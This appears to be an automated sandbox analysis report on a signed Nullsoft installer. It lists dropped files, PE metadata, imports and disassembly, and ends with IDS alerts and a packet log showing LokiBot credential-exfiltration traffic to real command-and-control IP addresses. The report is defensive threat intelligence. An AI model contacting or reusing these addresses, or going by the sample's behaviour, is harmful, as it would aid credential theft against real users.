                Preview:.;!@Lang2@!UTF-8!..; : Kirill Gulyakevitch..; 9.07 : 2011-03-15 : Drive DRKA..;..;..;..;..;..;..;..;..;..0..7-Zip..Belarusian..............401..OK................&.....&....&......................&............440..... ... &........ ... .&.......................&.......&.. ....... ......&......... ......... ........ ....... .......... ........?..500..&......&........&........&..........&.......&.........540..&................ &................... .&................&................&.........&......... ......&........... ......&............&..... ..........&.'...... .............&...........&................. ......Diff..&........ .
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:SVG Scalable Vector Graphics image
                Category:dropped
                Size (bytes):998
                Entropy (8bit):5.186938379246791
                Encrypted:false
                SSDEEP:24:t4CBGD0QNRWLLxo2em0yKbRAecFxV0/wXK:gDrc0NtAecFiH
                MD5:CB1EEE7BDB582B756D0F68EF02D6D96D
                SHA1:9E9B0F25BC472EF1C1C13EEAC12FD11C4CC0D2D9
                SHA-256:20EA767E852A8EBF2C5BA16D56CBAE10BD09D6CBA89B372A57EAA973AD3281B4
                SHA-512:E22FAEAE78D244A0F4E7215B31125D5AA4FD66C0720B0DE61D12084EAB879D7A9E231CCD5CD431417115B0945B450DC348DA400D67DB1898513B7BD6B9C274DB
                Malicious:false
                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#bebebe" fill="#474747"><path d="M3 9h10c.554 0 1 .446 1 1v3c0 .554-.446 1-1 1H3c-.554 0-1-.446-1-1v-3c0-.554.446-1 1-1z" style="marker:none" overflow="visible"/><path d="M7 0s-.709-.014-1.447.356C4.814.725 4 1.666 4 3v3h2V3c0-.667.186-.725.447-.855C6.71 2.014 7 2 7 2h2s.291.014.553.145c.261.13.447.188.447.855v8h2V3c0-1.333-.814-2.275-1.553-2.644C9.71-.014 9 0 9 0z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" font-weight="400" font-family="sans-serif" overflow="visible"/><path d="M2 12h12v4H2z" style="marker:none" overflow="visible"/></g></svg>
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:HTML document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1245
                Entropy (8bit):5.462849750105637
                Encrypted:false
                SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                MD5:5343C1A8B203C162A3BF3870D9F50FD4
                SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                Malicious:false
                Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):555
                Entropy (8bit):7.499536740374189
                Encrypted:false
                SSDEEP:12:6v/7anZhFxDEKwjAq0kaO/yvSL6T1pjNngLpzPanwmB9HE4JqSjF:5bDEPxdqKLmpqLdynw29kEqSZ
                MD5:BFF011148B773FA44B9A9BB029E8CC52
                SHA1:F2B838927E320D12649CEFDEA3AFE383C6650D7C
                SHA-256:B21DE7B432A7A67544D007ECC0FDD95F8E8C6129AF558A32102EE04C08635653
                SHA-512:A57C83AEE0E1F4C530D2F5B90589C31FD6E2FF8F62F998963284218FAC5EE164BCA7A619A9597DC3E2ECD0095A2CF04467E89EDF86700E1A90B3DF60B5121C9B
                Malicious:false
                Preview:.PNG........IHDR................a....IDATx......A....v...b.m.A..Q..Q..UD5.F.m.....fs{9.}...V.`....%.kt....R...+%7.}p..@.}:..u466`.6uu.tvv...N6....D"Q......po".;.4....W..g.b..\.~?...<.../.....$..5....................r.+..ah...F;.H.`b ....4.[...k.6.<..Kk.m[h..x`...R...z{.H.......Oax.e..{.........w._...c._>..6..T*HY.1! e.#....G......{.AB..l.K"..P(..j..$.R.}L.5.....@.>.......X...hE....L.."L.....=~..7n.2.,RJ.01.....B.AWW..<q......Ng.,../.Z...+...N].r.5.EB.p$..!,....,......SW.TD+U...K...ee._.N*.[..`..1q..v\#6..?;7..4..3....IEND.B`.
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:SVG Scalable Vector Graphics image
                Category:dropped
                Size (bytes):680
                Entropy (8bit):5.109191824773878
                Encrypted:false
                SSDEEP:12:t4CP5GEA9xI7jhz4AeW02KdTwWjhz4AeW02KdTPqkoop4p:t4CBGEAgF4AeW0/N4AeW0/Zqg4p
                MD5:379690952AAA576521D51249D404CBCD
                SHA1:61A8A95B0454422AA47379CF983B99FFDD839439
                SHA-256:EAD402FB0B85DB153356EC695016FD4F2C4031367D8ED6D1C1EF5FF4F28A8DE8
                SHA-512:35B6BC866C3D02A2486D3447C82405103DE89D46940F7FE44A7009E714BBA57FBE601EEC939C3206ADB06FB31C4FD1D3822A0ED52A346ACFDE5908643432F928
                Malicious:false
                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" fill="#474747"><path d="M13 5v2h1v5H4v2h12V5z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-weight="400" font-family="Sans" overflow="visible"/><path d="M0 2v9h12V2zm2 2h8v5H2z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-weight="400" font-family="Sans" overflow="visible"/><path d="M3 7c2.32 1 3.045-1.66 6 0v1H3z" style="marker:none" overflow="visible" opacity=".35"/></g></svg>
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):220
                Entropy (8bit):6.546211943247282
                Encrypted:false
                SSDEEP:6:6v/lhPysde0C1jngP3V95D2tOA/RDvhpLUxbVp:6v/7jC1zi3Sr/hW
                MD5:C84EE7522C124892455BB09DEBCF9340
                SHA1:AF87A2A5688346A3902762DD250328B7EF224620
                SHA-256:E0A3BD6FE1A1BAEFFE04BCA2980ADF755F888E31DCE3686B16C5DAC4202A38C8
                SHA-512:3BEED79366F15CD075781F677C0C9E84081D2189D1FB541A34AA25980B48701A3D93DC550E4ABEB550EFBE3167B1CAB8338E22F4603C6A71936876FBA75FAD58
                Malicious:false
                Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...=..P.../z.Q..Kx....l.b. )...x........t.......Y~.)......7......W.xk.'A...u.........%..!k.k5.|E=+X..,,a.S.H4p*D8.8(FH.a..5.x...%.....7..8s:.......IEND.B`.
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):144
                Entropy (8bit):5.708279548998072
                Encrypted:false
                SSDEEP:3:yionv//thPl9vt3lAnsrtxBllAoSF1/LvgStjP9f9uvJYUo+/JHt//sup:6v/lhPysKo21/Lvlt7V9+YUouJH1/jp
                MD5:1ED278AD206D6EA33FF787DD326E0FC5
                SHA1:8CFF7AD12FC0E5545E71D05879A0245BEDAF4D46
                SHA-256:CC88E76F7C7D2E5B07E49D1F2AD88F8BAFC0542EB11CEB2B2FFF235C87AB4417
                SHA-512:7291085B6153C02EDBF679CDDB93B97DBB74943F216EB622CE9722E02613269F626F8A7A5BE8DA683153E9AEE22C40ED7264E8A0ED62A99F477E2B96642596BF
                Malicious:false
                Preview:.PNG........IHDR................a....sBIT....|.d....GIDAT8.c`..0...O.Z&J]0.. ...&u]..5?......b....Q.E./.....t@..,....)1..,b...#.=....IEND.B`.
                Process:C:\Users\user\Desktop\HfJLn9erXb.exe
                File Type:PNG image data, 600 x 600, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):16669
                Entropy (8bit):7.836876926418697
                Encrypted:false
                SSDEEP:384:dg1Ew+1FT+/6trrKWzge5jh2xmalhctpNy:W1E1c6tru1CUYa4tDy
                MD5:F80867A421C85C6E2865CF85FF7C4B02
                SHA1:C3EAB6B7E92646FE3407B2B3C5AFFE13A7873C48
                SHA-256:BCAA3B1333919176137D4DE4B1E3F31126159B12F959D7277BD8537B95139BD3
                SHA-512:06B51E660AEE86FC3BB068C6DEA046920E04F86B8EDD02E640EAC619F0F0D7E87E5CAE5BE1390CEBC5DFE70AA13BAB1710176E88C9D1C859182629D429745D78
                Malicious:false
                Preview:.PNG........IHDR...X...X......f......tEXtSoftware.Adobe ImageReadyq.e<..@.IDATx.....\.}..../...].{`.......D.\..u......#..V.eW.G>"W....V..d..IVU".:.D<$J.....{q/.....`0g./..z....A.`..?..p....M......._.'...L...]~.....;.........,..... ....X.....@`.. ..........@`...,..... ....X.....@`.. ..........@`...,..........X.....@`.. ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X......... ..........@`...,..........X...,..... ..........@`...,..........X...,..... ....~.....N...@...C{..o.?2.....x...?_....sC..O8...n..J.ttbv9...w~...ym..O.......vq"f..qrjt9... ..].S..Hz.gf}.,.Sm!...>..Xh..:S.};d.....2..?.......2...1..ep...K.{.?..@`.7=...7U..C......S...6....|a.}].._..d....,_.........+__..JS.....X.u...;..Q.x.z9...eP5f.H..nnz.&h...4.kz......&....o)..=..x.=...y ....6i...wL.....Y(.2NRP..J...HL/K#^izqpbUp}...q...g.......".....4R..#.VFrR|.LF>w~.Pm..\..4.5t{.-..
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Entropy (8bit):7.56953186638099
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:HfJLn9erXb.exe
                File size:335976
                MD5:049ecad4587538c292e3ebeee5947eb5
                SHA1:12aabeb19083dd114b7b94c836b031de3945d2c9
                SHA256:cf9a08d65a0b472b1ed84638a09d39d741f34e9cd2641092141a9bf1a5f796a6
                SHA512:12092128f6b2f6ea6ab86a7b1812e550e598dfecd43a240bd1ffc0bd15ff9c24e3c9bb40a4273ad706b9a7a7ad890b1c708c42cc23ec359626f5024b36db03ce
                SSDEEP:6144:DDk9dhfzelxllPuHBXZOEz5hN4EAnKQo4N7kqZ7t+roIbvS:U9u3lWHBXZTENnKza7kqZ5+rh6
                TLSH:7D6401913AE0D467FC5A4630CAA5E5F3D2A1FE04C916C18373647F6F7D322419922EBA
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...+.oZ.................`.........
                Icon Hash:08c2b0d8cc64b046
                Entrypoint:0x4031d6
                Entrypoint Section:.text
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0x5A6FED2B [Tue Jan 30 03:57:31 2018 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                Signature Valid:false
                Signature Issuer:E=Brooking183@Flydes25.Dyr, OU="Magtbalancerne Regnvejrsdagene Intensives ", O=Skizofren, L=Onalaska, S=Wisconsin, C=US
                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                Error Number:-2146762487
                Not Before, Not After
                • 05/02/2023 08:25:21 04/02/2026 08:25:21
                Subject Chain
                • E=Brooking183@Flydes25.Dyr, OU="Magtbalancerne Regnvejrsdagene Intensives ", O=Skizofren, L=Onalaska, S=Wisconsin, C=US
                Version:3
                Thumbprint MD5:DE53E25C4A808A06A0CD944E65FB058D
                Thumbprint SHA-1:B1DD19494EAA53E29C92E68EB19E33CFABB34DE0
                Thumbprint SHA-256:12FF0462FE369CB81BB77B13ADFE3B705E7F71A5CFA614B370A8D6D63719C06F
                Serial:6CA44E753450CEC7C37D62FEA0B835456441D271
                Instruction
                sub esp, 00000184h
                push ebx
                push esi
                push edi
                xor ebx, ebx
                push 00008001h
                mov dword ptr [esp+18h], ebx
                mov dword ptr [esp+10h], 00409198h
                mov dword ptr [esp+20h], ebx
                mov byte ptr [esp+14h], 00000020h
                call dword ptr [004070A0h]
                call dword ptr [0040709Ch]
                and eax, BFFFFFFFh
                cmp ax, 00000006h
                mov dword ptr [0042370Ch], eax
                je 00007FA97059E073h
                push ebx
                call 00007FA9705A114Ah
                cmp eax, ebx
                je 00007FA97059E069h
                push 00000C00h
                call eax
                mov esi, 00407298h
                push esi
                call 00007FA9705A10C6h
                push esi
                call dword ptr [00407098h]
                lea esi, dword ptr [esi+eax+01h]
                cmp byte ptr [esi], bl
                jne 00007FA97059E04Dh
                push 0000000Ah
                call 00007FA9705A111Eh
                push 00000008h
                call 00007FA9705A1117h
                push 00000006h
                mov dword ptr [00423704h], eax
                call 00007FA9705A110Bh
                cmp eax, ebx
                je 00007FA97059E071h
                push 0000001Eh
                call eax
                test eax, eax
                je 00007FA97059E069h
                or byte ptr [0042370Fh], 00000040h
                push ebp
                call dword ptr [00407044h]
                push ebx
                call dword ptr [00407288h]
                mov dword ptr [004237D8h], eax
                push ebx
                lea eax, dword ptr [esp+38h]
                push 00000160h
                push eax
                push ebx
                push 0041ECC8h
                call dword ptr [00407178h]
                push 00409188h
                Programming Language:
                • [EXP] VC++ 6.0 SP5 build 8804
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000xa3c0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x516500xa18
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x5f0d0x6000False0.6649169921875data6.450520423955375IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x70000x12480x1400False0.4275390625data5.007650149182371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x90000x1a8180x400False0.6376953125data5.129587811765307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .ndata0x240000x120000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x360000xa3c00xa400False0.0760766006097561data1.8822021165260459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountry
                RT_BITMAP0x362680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
                RT_ICON0x365d00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 0EnglishUnited States
                RT_DIALOG0x3fa780x144dataEnglishUnited States
                RT_DIALOG0x3fbc00x13cdataEnglishUnited States
                RT_DIALOG0x3fd000x120dataEnglishUnited States
                RT_DIALOG0x3fe200x11cdataEnglishUnited States
                RT_DIALOG0x3ff400xc4dataEnglishUnited States
                RT_DIALOG0x400080x60dataEnglishUnited States
                RT_GROUP_ICON0x400680x14dataEnglishUnited States
                RT_MANIFEST0x400800x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
                DLLImport
                KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.11.20185.246.220.8549802802024317 03/17/23-20:59:19.936439TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24980280192.168.11.20185.246.220.85
                192.168.11.20185.246.220.8549802802024312 03/17/23-20:59:19.936439TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14980280192.168.11.20185.246.220.85
                192.168.11.20185.246.220.8549802802825766 03/17/23-20:59:19.936439TCP2825766ETPRO TROJAN LokiBot Checkin M24980280192.168.11.20185.246.220.85
                192.168.11.20185.246.220.8549802802021641 03/17/23-20:59:19.936439TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.11.20185.246.220.85
                192.168.11.20185.246.220.8549802802025381 03/17/23-20:59:19.936439TCP2025381ET TROJAN LokiBot Checkin4980280192.168.11.20185.246.220.85
                TimestampSource PortDest PortSource IPDest IP
                Mar 17, 2023 20:59:17.882953882 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.884468079 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.926943064 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.927155972 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.928247929 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.970037937 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.974704027 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.974900007 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.975447893 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.975519896 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.975660086 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.975795031 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.975795031 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.975904942 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.975996971 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.976087093 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.976142883 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.976171970 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.976231098 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.976269007 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.976329088 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:18.976335049 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.976403952 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:18.976511002 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.016927004 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.016976118 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.017230988 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.018229961 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.018277884 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.018404961 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.018404961 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.018515110 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.018558025 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.018759012 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.019373894 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.019419909 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.019608021 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.019623995 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.019679070 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.019730091 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.019830942 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.019870043 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.019968987 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.020008087 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.020052910 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.020090103 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.020126104 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.020353079 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.020384073 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.020433903 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.020549059 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.020648956 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.020739079 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.059221983 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.059319973 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.059377909 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.059433937 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.059453011 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.059521914 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.059623957 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.059782028 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.060463905 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.060560942 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.060620070 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.060698032 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.060733080 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.060751915 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.060791016 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.060844898 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.060903072 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.060905933 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.061070919 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.061120033 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.061170101 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.061417103 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.061604023 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.061774969 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.061860085 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.061928034 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.062057972 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.062093973 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.062107086 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.062211990 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.062289953 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.062321901 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.062473059 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.062473059 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.062524080 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.062683105 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.062753916 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.062870026 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.062887907 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.063028097 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.063091993 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.063224077 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.063230991 CET804980185.95.248.49192.168.11.20
